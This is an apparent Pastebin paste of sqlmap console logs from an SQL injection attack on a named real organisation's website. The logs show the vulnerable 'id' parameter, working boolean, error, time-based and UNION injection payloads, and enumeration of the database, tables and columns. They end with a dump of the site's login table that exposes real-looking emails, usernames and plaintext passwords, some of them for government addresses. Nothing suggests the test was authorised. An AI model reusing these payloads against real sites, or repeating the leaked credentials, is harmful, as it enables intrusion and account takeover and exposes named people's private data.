Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ___ ___| |_____ ___ ___ {1.0.4.0#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 08:59:40
- [08:59:40] [INFO] testing connection to the target URL
- [08:59:43] [INFO] heuristics detected web page charset 'ISO-8859-2'
- [08:59:43] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
- [08:59:44] [INFO] testing if the target URL is stable
- [08:59:45] [INFO] target URL is stable
- [08:59:45] [INFO] testing if GET parameter 'id' is dynamic
- [08:59:46] [WARNING] GET parameter 'id' does not appear dynamic
- [08:59:46] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
- [08:59:46] [INFO] testing for SQL injection on GET parameter 'id'
- it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
- for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
- [08:59:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [08:59:58] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
- [08:59:59] [WARNING] reflective value(s) found and filtering out
- [09:00:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
- [09:00:30] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
- [09:01:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
- [09:01:14] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)' injectable
- [09:01:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
- [09:01:15] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
- [09:01:15] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
- [09:01:15] [INFO] testing 'MySQL inline queries'
- [09:01:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
- [09:01:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
- [09:01:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
- [09:01:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [09:01:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
- [09:01:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
- [09:01:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
- [09:01:19] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
- [09:01:24] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
- [09:01:24] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
- [09:01:30] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 OR time-based blind (SELECT)' injectable
- [09:01:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
- [09:01:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
- [09:01:31] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
- [09:01:32] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
- [09:01:35] [INFO] target URL appears to have 13 columns in query
- [09:01:41] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
- [09:01:41] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
- GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
- sqlmap identified the following injection point(s) with a total of 241 HTTP(s) requests:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
- Payload: id=29 OR NOT 3833=3833#
- Type: error-based
- Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
- Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
- Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)
- Type: UNION query
- Title: Generic UNION query (NULL) - 13 columns
- Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
- ---
- [09:02:32] [INFO] the back-end DBMS is MySQL
- web application technology: PHP 5.6.31, Apache 2.4.27
- back-end DBMS: MySQL 5.0
- [09:02:32] [INFO] fetching database names
- [09:02:32] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
- [09:02:34] [INFO] the SQL query used returns 2 entries
- [09:02:34] [INFO] retrieved: information_schema
- [09:02:35] [INFO] retrieved: acfmissi_acfmdb
- available databases [2]:
- [*] acfmissi_acfmdb
- [*] information_schema
- [09:02:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
- root@BitCoin:/home/helmi# sqlmap -u http://acfmission.org/acfmdisp.php?id=29 -D acfmissi_acfmdb --table
- _
- ___ ___| |_____ ___ ___ {1.0.4.0#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 09:03:10
- [09:03:10] [INFO] resuming back-end DBMS 'mysql'
- [09:03:11] [INFO] testing connection to the target URL
- [09:03:13] [INFO] heuristics detected web page charset 'ISO-8859-2'
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
- Payload: id=29 OR NOT 3833=3833#
- Type: error-based
- Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
- Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
- Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)
- Type: UNION query
- Title: Generic UNION query (NULL) - 13 columns
- Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
- ---
- [09:03:13] [INFO] the back-end DBMS is MySQL
- web application technology: PHP 5.6.31, Apache 2.4.27
- back-end DBMS: MySQL 5.0
- [09:03:13] [INFO] fetching tables for database: 'acfmissi_acfmdb'
- [09:03:14] [INFO] the SQL query used returns 19 entries
- [09:03:15] [INFO] retrieved: announcement
- [09:03:16] [INFO] retrieved: article
- [09:03:17] [INFO] retrieved: comments
- [09:03:18] [INFO] retrieved: country
- [09:03:18] [INFO] retrieved: doctype
- [09:03:19] [INFO] retrieved: document
- [09:03:20] [INFO] retrieved: enquiry
- [09:03:21] [INFO] retrieved: events
- [09:03:22] [INFO] retrieved: eventtype
- [09:03:23] [INFO] retrieved: gallery
- [09:03:24] [INFO] retrieved: link
- [09:03:24] [INFO] retrieved: login
- [09:03:25] [INFO] retrieved: mail
- [09:03:26] [INFO] retrieved: news
- [09:03:27] [INFO] retrieved: news category
- [09:03:28] [INFO] retrieved: page
- [09:03:29] [INFO] retrieved: prayereq
- [09:03:30] [INFO] retrieved: testimony
- [09:03:30] [INFO] retrieved: userlogin
- Database: acfmissi_acfmdb
- [19 tables]
- +---------------+
- | news category |
- | announcement |
- | article |
- | comments |
- | country |
- | doctype |
- | document |
- | enquiry |
- | events |
- | eventtype |
- | gallery |
- | link |
- | login |
- | mail |
- | news |
- | page |
- | prayereq |
- | testimony |
- | userlogin |
- +---------------+
- [09:03:31] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
- root@BitCoin:/home/helmi# sqlmap -u http://acfmission.org/acfmdisp.php?id=29 -D acfmissi_acfmdb --columns
- _
- ___ ___| |_____ ___ ___ {1.0.4.0#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 09:04:13
- [09:04:14] [INFO] resuming back-end DBMS 'mysql'
- [09:04:15] [INFO] testing connection to the target URL
- [09:04:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
- Payload: id=29 OR NOT 3833=3833#
- Type: error-based
- Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
- Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
- Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)
- Type: UNION query
- Title: Generic UNION query (NULL) - 13 columns
- Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
- ---
- [09:04:18] [INFO] the back-end DBMS is MySQL
- web application technology: PHP 5.6.31, Apache 2.4.27
- back-end DBMS: MySQL 5.0
- [09:04:18] [INFO] fetching tables for database: 'acfmissi_acfmdb'
- [09:04:18] [INFO] the SQL query used returns 19 entries
- [09:04:18] [INFO] resumed: announcement
- [09:04:18] [INFO] resumed: article
- [09:04:18] [INFO] resumed: comments
- [09:04:18] [INFO] resumed: country
- [09:04:18] [INFO] resumed: doctype
- [09:04:18] [INFO] resumed: document
- [09:04:18] [INFO] resumed: enquiry
- [09:04:18] [INFO] resumed: events
- [09:04:18] [INFO] resumed: eventtype
- [09:04:18] [INFO] resumed: gallery
- [09:04:18] [INFO] resumed: link
- [09:04:18] [INFO] resumed: login
- [09:04:18] [INFO] resumed: mail
- [09:04:18] [INFO] resumed: news
- [09:04:18] [INFO] resumed: news category
- [09:04:18] [INFO] resumed: page
- [09:04:18] [INFO] resumed: prayereq
- [09:04:18] [INFO] resumed: testimony
- [09:04:18] [INFO] resumed: userlogin
- [09:04:18] [INFO] fetching columns for table 'announcement' in database 'acfmissi_acfmdb'
- [09:04:19] [INFO] the SQL query used returns 5 entries
- [09:04:20] [INFO] retrieved: "ID","int(12)"
- [09:04:21] [INFO] retrieved: "Content","text"
- [09:04:22] [INFO] retrieved: "Date","date"
- [09:04:23] [INFO] retrieved: "Title","varchar(200)"
- [09:04:24] [INFO] retrieved: "pic","varchar(100)"
- [09:04:24] [INFO] fetching columns for table 'prayereq' in database 'acfmissi_acfmdb'
- [09:04:25] [INFO] the SQL query used returns 4 entries
- [09:04:26] [INFO] retrieved: "id","int(34)"
- [09:04:27] [INFO] retrieved: "Name","varchar(80)"
- [09:04:27] [INFO] retrieved: "Email","varchar(80)"
- [09:04:28] [INFO] retrieved: "Prayer","text"
- [09:04:28] [INFO] fetching columns for table 'userlogin' in database 'acfmissi_acfmdb'
- [09:04:29] [INFO] the SQL query used returns 3 entries
- [09:04:30] [INFO] retrieved: "ID","int(18)"
- [09:04:31] [INFO] retrieved: "Username","varchar(49)"
- [09:04:32] [INFO] retrieved: "Password","varchar(56)"
- [09:04:32] [INFO] fetching columns for table 'mail' in database 'acfmissi_acfmdb'
- [09:04:33] [INFO] the SQL query used returns 5 entries
- [09:04:34] [INFO] retrieved: "id","int(18)"
- [09:04:34] [INFO] retrieved: "name","varchar(60)"
- [09:04:35] [INFO] retrieved: "email","varchar(80)"
- [09:04:36] [INFO] retrieved: "unsubscribed","varchar(100)"
- [09:04:37] [INFO] retrieved: "sendmsg","varchar(100)"
- [09:04:37] [INFO] fetching columns for table 'enquiry' in database 'acfmissi_acfmdb'
- [09:04:38] [INFO] the SQL query used returns 4 entries
- [09:04:39] [INFO] retrieved: "id","int(15)"
- [09:04:40] [INFO] retrieved: "Name","varchar(60)"
- [09:04:41] [INFO] retrieved: "Email","varchar(65)"
- [09:04:42] [INFO] retrieved: "Comment","varchar(250)"
- [09:04:42] [INFO] fetching columns for table 'country' in database 'acfmissi_acfmdb'
- [09:04:42] [INFO] the SQL query used returns 2 entries
- [09:04:43] [INFO] retrieved: "id","int(255) unsigned"
- [09:04:44] [INFO] retrieved: "country_name","varchar(255)"
- [09:04:44] [INFO] fetching columns for table 'testimony' in database 'acfmissi_acfmdb'
- [09:04:45] [INFO] the SQL query used returns 5 entries
- [09:04:46] [INFO] retrieved: "id","int(34)"
- [09:04:47] [INFO] retrieved: "Name","varchar(80)"
- [09:04:48] [INFO] retrieved: "Email","varchar(80)"
- [09:04:49] [INFO] retrieved: "Testimony","text"
- [09:04:49] [INFO] retrieved: "Dateposted","date"
- [09:04:49] [INFO] fetching columns for table 'doctype' in database 'acfmissi_acfmdb'
- [09:04:50] [INFO] the SQL query used returns 2 entries
- [09:04:51] [INFO] retrieved: "id","int(35)"
- [09:04:52] [INFO] retrieved: "documents","varchar(99)"
- [09:04:52] [INFO] fetching columns for table 'comments' in database 'acfmissi_acfmdb'
- [09:04:53] [INFO] the SQL query used returns 5 entries
- [09:04:54] [INFO] retrieved: "ID","int(18)"
- [09:04:55] [INFO] retrieved: "Name","varchar(100)"
- [09:04:56] [INFO] retrieved: "Email","varchar(100)"
- [09:04:57] [INFO] retrieved: "comments","text"
- [09:04:57] [INFO] retrieved: "visible","varchar(120)"
- [09:04:57] [INFO] fetching columns for table 'gallery' in database 'acfmissi_acfmdb'
- [09:04:58] [INFO] the SQL query used returns 5 entries
- [09:04:59] [INFO] retrieved: "id","int(16)"
- [09:05:00] [INFO] retrieved: "eventTitle","varchar(300)"
- [09:05:01] [INFO] retrieved: "pics","varchar(100)"
- [09:05:02] [INFO] retrieved: "pictitle","varchar(250)"
- [09:05:03] [INFO] retrieved: "Date","date"
- [09:05:03] [INFO] fetching columns for table 'link' in database 'acfmissi_acfmdb'
- [09:05:04] [INFO] the SQL query used returns 3 entries
- [09:05:05] [INFO] retrieved: "id","int(60)"
- [09:05:05] [INFO] retrieved: "LinkName","varchar(100)"
- [09:05:06] [INFO] retrieved: "link_order","varchar(100)"
- [09:05:06] [INFO] fetching columns for table 'eventtype' in database 'acfmissi_acfmdb'
- [09:05:07] [INFO] the SQL query used returns 2 entries
- [09:05:08] [INFO] retrieved: "id","int(55)"
- [09:05:09] [INFO] retrieved: "category","varchar(180)"
- [09:05:09] [INFO] fetching columns for table 'article' in database 'acfmissi_acfmdb'
- [09:05:10] [INFO] the SQL query used returns 10 entries
- [09:05:11] [INFO] retrieved: "Id","int(17)"
- [09:05:12] [INFO] retrieved: "Event","varchar(100)"
- [09:05:12] [INFO] retrieved: "Speaker","varchar(80)"
- [09:05:13] [INFO] retrieved: "Title","varchar(69)"
- [09:05:14] [INFO] retrieved: "Summary","varchar(280)"
- [09:05:15] [INFO] retrieved: "Article","longtext"
- [09:05:16] [INFO] retrieved: "Date","date"
- [09:05:18] [INFO] retrieved: "Dateposted","date"
- [09:05:18] [INFO] retrieved: "pics","varchar(100)"
- [09:05:19] [INFO] retrieved: "display","varchar(20)"
- [09:05:19] [INFO] fetching columns for table 'login' in database 'acfmissi_acfmdb'
- [09:05:20] [INFO] the SQL query used returns 6 entries
- [09:05:21] [INFO] retrieved: "ID","int(18)"
- [09:05:22] [INFO] retrieved: "username","varchar(25)"
- [09:05:23] [INFO] retrieved: "password","varchar(100)"
- [09:05:24] [INFO] retrieved: "name","varchar(35)"
- [09:05:25] [INFO] retrieved: "email","varchar(60)"
- [09:05:25] [INFO] retrieved: "level","varchar(25)"
- [09:05:25] [INFO] fetching columns for table 'document' in database 'acfmissi_acfmdb'
- [09:05:26] [INFO] the SQL query used returns 8 entries
- [09:05:27] [INFO] retrieved: "ID","int(16)"
- [09:05:28] [INFO] retrieved: "category","varchar(25)"
- [09:05:29] [INFO] retrieved: "Description","text"
- [09:05:30] [INFO] retrieved: "document","varchar(60)"
- [09:05:31] [INFO] retrieved: "date","date"
- [09:05:32] [INFO] retrieved: "doctitle","varchar(55)"
- [09:05:32] [INFO] retrieved: "display","varchar(20)"
- [09:05:33] [INFO] retrieved: "Pics","varchar(80)"
- [09:05:33] [INFO] fetching columns for table 'news' in database 'acfmissi_acfmdb'
- [09:05:34] [INFO] the SQL query used returns 12 entries
- [09:05:35] [INFO] retrieved: "ID","int(16)"
- [09:05:36] [INFO] retrieved: "Title","varchar(250)"
- [09:05:37] [INFO] retrieved: "News_Category","varchar(200)"
- [09:05:38] [INFO] retrieved: "Summary","varchar(350)"
- [09:05:39] [INFO] retrieved: "content","text"
- [09:05:39] [INFO] retrieved: "Date","date"
- [09:05:40] [INFO] retrieved: "Source","varchar(85)"
- [09:05:41] [INFO] retrieved: "pics","varchar(80)"
- [09:05:42] [INFO] retrieved: "file","varchar(80)"
- [09:05:43] [INFO] retrieved: "Postedby","varchar(80)"
- [09:05:44] [INFO] retrieved: "Display","varchar(80)"
- [09:05:45] [INFO] retrieved: "Main","varchar(29)"
- [09:05:45] [INFO] fetching columns for table 'events' in database 'acfmissi_acfmdb'
- [09:05:46] [INFO] the SQL query used returns 11 entries
- [09:05:46] [INFO] retrieved: "ID","int(18)"
- [09:05:47] [INFO] retrieved: "eventTitle","varchar(256)"
- [09:05:48] [INFO] retrieved: "StartDate","date"
- [09:05:49] [INFO] retrieved: "eventDuration","varchar(100)"
- [09:05:50] [INFO] retrieved: "eventType","varchar(85)"
- [09:05:51] [INFO] retrieved: "content","text"
- [09:05:52] [INFO] retrieved: "PaperTitle","varchar(256)"
- [09:05:53] [INFO] retrieved: "Author","varchar(35)"
- [09:05:53] [INFO] retrieved: "Status","varchar(25)"
- [09:05:54] [INFO] retrieved: "file","text"
- [09:05:55] [INFO] retrieved: "dateposted","date"
- [09:05:55] [INFO] fetching columns for table 'news category' in database 'acfmissi_acfmdb'
- [09:05:56] [INFO] the SQL query used returns 2 entries
- [09:05:57] [INFO] retrieved: "id","int(55)"
- [09:05:58] [INFO] retrieved: "Category","varchar(100)"
- [09:05:58] [INFO] fetching columns for table 'page' in database 'acfmissi_acfmdb'
- [09:05:59] [INFO] the SQL query used returns 13 entries
- [09:06:00] [INFO] retrieved: "id","int(24)"
- [09:06:01] [INFO] retrieved: "Pagetitle","varchar(80)"
- [09:06:01] [INFO] retrieved: "Mainpage","varchar(100)"
- [09:06:02] [INFO] retrieved: "linktype","varchar(100)"
- [09:06:03] [INFO] retrieved: "linkorder","varchar(100)"
- [09:06:04] [INFO] retrieved: "pics1","varchar(100)"
- [09:06:05] [INFO] retrieved: "Pics2","varchar(100)"
- [09:06:06] [INFO] retrieved: "Maincontent","text"
- [09:06:07] [INFO] retrieved: "Content1","text"
- [09:06:08] [INFO] retrieved: "Content2","text"
- [09:06:08] [INFO] retrieved: "Content3","text"
- [09:06:09] [INFO] retrieved: "Display","text"
- [09:06:10] [INFO] retrieved: "datecreated","date"
- Database: acfmissi_acfmdb
- Table: announcement
- [5 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | Date | date |
- | Content | text |
- | ID | int(12) |
- | pic | varchar(100) |
- | Title | varchar(200) |
- +---------+--------------+
- Database: acfmissi_acfmdb
- Table: page
- [13 columns]
- +-------------+--------------+
- | Column | Type |
- +-------------+--------------+
- | Content1 | text |
- | Content2 | text |
- | Content3 | text |
- | datecreated | date |
- | Display | text |
- | id | int(24) |
- | linkorder | varchar(100) |
- | linktype | varchar(100) |
- | Maincontent | text |
- | Mainpage | varchar(100) |
- | Pagetitle | varchar(80) |
- | pics1 | varchar(100) |
- | Pics2 | varchar(100) |
- +-------------+--------------+
- Database: acfmissi_acfmdb
- Table: document
- [8 columns]
- +-------------+-------------+
- | Column | Type |
- +-------------+-------------+
- | date | date |
- | category | varchar(25) |
- | Description | text |
- | display | varchar(20) |
- | doctitle | varchar(55) |
- | document | varchar(60) |
- | ID | int(16) |
- | Pics | varchar(80) |
- +-------------+-------------+
- Database: acfmissi_acfmdb
- Table: enquiry
- [4 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | Comment | varchar(250) |
- | Email | varchar(65) |
- | id | int(15) |
- | Name | varchar(60) |
- +---------+--------------+
- Database: acfmissi_acfmdb
- Table: country
- [2 columns]
- +--------------+-------------------+
- | Column | Type |
- +--------------+-------------------+
- | country_name | varchar(255) |
- | id | int(255) unsigned |
- +--------------+-------------------+
- Database: acfmissi_acfmdb
- Table: testimony
- [5 columns]
- +------------+-------------+
- | Column | Type |
- +------------+-------------+
- | Dateposted | date |
- | Email | varchar(80) |
- | id | int(34) |
- | Name | varchar(80) |
- | Testimony | text |
- +------------+-------------+
- Database: acfmissi_acfmdb
- Table: doctype
- [2 columns]
- +-----------+-------------+
- | Column | Type |
- +-----------+-------------+
- | documents | varchar(99) |
- | id | int(35) |
- +-----------+-------------+
- Database: acfmissi_acfmdb
- Table: comments
- [5 columns]
- +----------+--------------+
- | Column | Type |
- +----------+--------------+
- | comments | text |
- | Email | varchar(100) |
- | ID | int(18) |
- | Name | varchar(100) |
- | visible | varchar(120) |
- +----------+--------------+
- Database: acfmissi_acfmdb
- Table: events
- [11 columns]
- +---------------+--------------+
- | Column | Type |
- +---------------+--------------+
- | Author | varchar(35) |
- | content | text |
- | dateposted | date |
- | eventDuration | varchar(100) |
- | eventTitle | varchar(256) |
- | eventType | varchar(85) |
- | file | text |
- | ID | int(18) |
- | PaperTitle | varchar(256) |
- | StartDate | date |
- | Status | varchar(25) |
- +---------------+--------------+
- Database: acfmissi_acfmdb
- Table: eventtype
- [2 columns]
- +----------+--------------+
- | Column | Type |
- +----------+--------------+
- | category | varchar(180) |
- | id | int(55) |
- +----------+--------------+
- Database: acfmissi_acfmdb
- Table: link
- [3 columns]
- +------------+--------------+
- | Column | Type |
- +------------+--------------+
- | id | int(60) |
- | link_order | varchar(100) |
- | LinkName | varchar(100) |
- +------------+--------------+
- Database: acfmissi_acfmdb
- Table: userlogin
- [3 columns]
- +----------+-------------+
- | Column | Type |
- +----------+-------------+
- | ID | int(18) |
- | Password | varchar(56) |
- | Username | varchar(49) |
- +----------+-------------+
- Database: acfmissi_acfmdb
- Table: mail
- [5 columns]
- +--------------+--------------+
- | Column | Type |
- +--------------+--------------+
- | email | varchar(80) |
- | id | int(18) |
- | name | varchar(60) |
- | sendmsg | varchar(100) |
- | unsubscribed | varchar(100) |
- +--------------+--------------+
- Database: acfmissi_acfmdb
- Table: article
- [10 columns]
- +------------+--------------+
- | Column | Type |
- +------------+--------------+
- | Date | date |
- | Article | longtext |
- | Dateposted | date |
- | display | varchar(20) |
- | Event | varchar(100) |
- | Id | int(17) |
- | pics | varchar(100) |
- | Speaker | varchar(80) |
- | Summary | varchar(280) |
- | Title | varchar(69) |
- +------------+--------------+
- Database: acfmissi_acfmdb
- Table: prayereq
- [4 columns]
- +--------+-------------+
- | Column | Type |
- +--------+-------------+
- | Email | varchar(80) |
- | id | int(34) |
- | Name | varchar(80) |
- | Prayer | text |
- +--------+-------------+
- Database: acfmissi_acfmdb
- Table: news
- [12 columns]
- +---------------+--------------+
- | Column | Type |
- +---------------+--------------+
- | Date | date |
- | content | text |
- | Display | varchar(80) |
- | file | varchar(80) |
- | ID | int(16) |
- | Main | varchar(29) |
- | News_Category | varchar(200) |
- | pics | varchar(80) |
- | Postedby | varchar(80) |
- | Source | varchar(85) |
- | Summary | varchar(350) |
- | Title | varchar(250) |
- +---------------+--------------+
- Database: acfmissi_acfmdb
- Table: gallery
- [5 columns]
- +------------+--------------+
- | Column | Type |
- +------------+--------------+
- | Date | date |
- | eventTitle | varchar(300) |
- | id | int(16) |
- | pics | varchar(100) |
- | pictitle | varchar(250) |
- +------------+--------------+
- Database: acfmissi_acfmdb
- Table: news category
- [2 columns]
- +----------+--------------+
- | Column | Type |
- +----------+--------------+
- | Category | varchar(100) |
- | id | int(55) |
- +----------+--------------+
- Database: acfmissi_acfmdb
- Table: login
- [6 columns]
- +----------+--------------+
- | Column | Type |
- +----------+--------------+
- | level | varchar(25) |
- | email | varchar(60) |
- | ID | int(18) |
- | name | varchar(35) |
- | password | varchar(100) |
- | username | varchar(25) |
- +----------+--------------+
- [09:06:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
- root@BitCoin:/home/helmi# sqlmap -u http://acfmission.org/acfmdisp.php?id=29 -D acfmissi_acfmdb -T login -C email,username,password,name,ID --dump
- _
- ___ ___| |_____ ___ ___ {1.0.4.0#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 09:07:20
- [09:07:21] [INFO] resuming back-end DBMS 'mysql'
- [09:07:22] [INFO] testing connection to the target URL
- [09:07:25] [INFO] heuristics detected web page charset 'ISO-8859-2'
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
- Payload: id=29 OR NOT 3833=3833#
- Type: error-based
- Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
- Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
- Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)
- Type: UNION query
- Title: Generic UNION query (NULL) - 13 columns
- Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
- ---
- [09:07:25] [INFO] the back-end DBMS is MySQL
- web application technology: PHP 5.6.31, Apache 2.4.27
- back-end DBMS: MySQL 5.0
- [09:07:25] [INFO] fetching entries of column(s) 'ID, email, name, password, username' for table 'login' in database 'acfmissi_acfmdb'
- [09:07:25] [INFO] the SQL query used returns 9 entries
- [09:07:26] [INFO] retrieved: "1","webprince64@yahoo.com","Adex","ahmed1","dayo"
- [09:07:27] [INFO] retrieved: "2","ojo@nsiwc.gov.ng","ojo","dayo","ojo"
- [09:07:28] [INFO] retrieved: "3","e_josseph@yahoo.com","Emmanuel Joseph","pas...
- [09:07:29] [INFO] retrieved: "4","hrowlands@sec.gov.ng","henry rowlands","pas...
- [09:07:30] [INFO] retrieved: "5","ope@ope.com","ope","ope","opeyemi"
- [09:07:31] [INFO] retrieved: "6","alf@afafag.com","alfred ako","alfred","alfred"
- [09:07:32] [INFO] retrieved: "7","clementyari@yahoo.com","clement","health","...
- [09:07:32] [INFO] retrieved: "8","dally@yahoo.com","david","davidally","david...
- [09:07:33] [INFO] retrieved: "9","info@acfmission.org","ACFM Admin","eternalh...
- [09:07:33] [INFO] analyzing table dump for possible password hashes
- Database: acfmissi_acfmdb
- Table: login
- [9 entries]
- +-----------------------+-----------+-------------+-----------------+----+
- | email | username | password | name | ID |
- +-----------------------+-----------+-------------+-----------------+----+
- | webprince64@yahoo.com | dayo | ahmed1 | Adex | 1 |
- | ojo@nsiwc.gov.ng | ojo | dayo | ojo | 2 |
- | e_josseph@yahoo.com | ejoseph | password | Emmanuel Joseph | 3 |
- | hrowlands@sec.gov.ng | hrowlands | password | henry rowlands | 4 |
